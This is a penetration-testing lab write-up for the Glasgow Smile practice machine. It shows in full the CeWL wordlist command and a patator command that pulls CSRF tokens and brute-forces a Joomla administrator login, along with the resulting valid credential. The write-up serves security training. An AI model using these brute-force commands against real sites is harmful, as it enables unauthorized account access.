InfoSec LAB

GlasgowSmile_Brute_Force_Attack

Created: 2 min read

Brute Force Attack

Login page for the admin panel is available at the /joomla/administrator/index.php endpoint Attempting a brute force attack

Wordlist

The /joomla/index.php shows a single blogpost made by super user. While it contains many ambiguous words, they maybe used for password.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ cewl http://$IP/joomla/ -d 4 -m 5 --with-numbers -w wordlist.txt             
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Generating a wordlist with CeWL

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ wc -l ./wordlist.txt                                                                              
90 ./wordlist.txt

90 words generated

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ cat users.txt                                                   
admin
joomla
author
joker

I also created a list of possible usernames based on the blogpost

CSRF Token Extraction

Joomla has a built-in CSRF mitigation to provide randomly a generated nonce into a hidden input field.

  • The first one is the value of the return parameter, which is index.php in the base64 format
  • The second one is the name attribute itself and its set to 1

While this can be handled easily with Burp Suite, I will use another advance fuzzing tool; patator

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ patator http_fuzz proxy=localhost:8080 url=http://$IP/joomla/administrator/index.php method=POST body="username=FILE0&passwd=FILE1&option=com_login&task=login&return=_CSRF1_&_CSRF2_=1" 0=users.txt 1=wordlist.txt follow=1 accept_cookie=1 -x ignore:fgrep='Username and password do not match or you do not have an account yet.' before_urls="http://$IP/joomla/administrator/index.php" before_egrep='_CSRF1_:type="hidden" name="return" value="(\w+)"|_CSRF2_:type="hidden" name="(\w+)" value="1"'
 
 
17:24:44 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.13.3 at 2025-06-25 17:24 CEST
17:24:45 patator    INFO -                                                                              
17:24:45 patator    INFO - code size:clen       time | candidate                          |   num | mesg
17:24:45 patator    INFO - -----------------------------------------------------------------------------
17:24:55 patator    INFO - 200  29784:28734    0.733 | joomla:Gotham                      |   152 | HTTP/1.1 200 OK
17:25:10 patator    INFO - Hits/Done/Skip/Fail/Size: 1/360/0/0/360, Avg: 14 r/s, Time: 0h 0m 25s

Found a valid credential; joomla:Gotham

Validation

Successfully authenticated to the admin panel

Interactive Graph View

Backlinks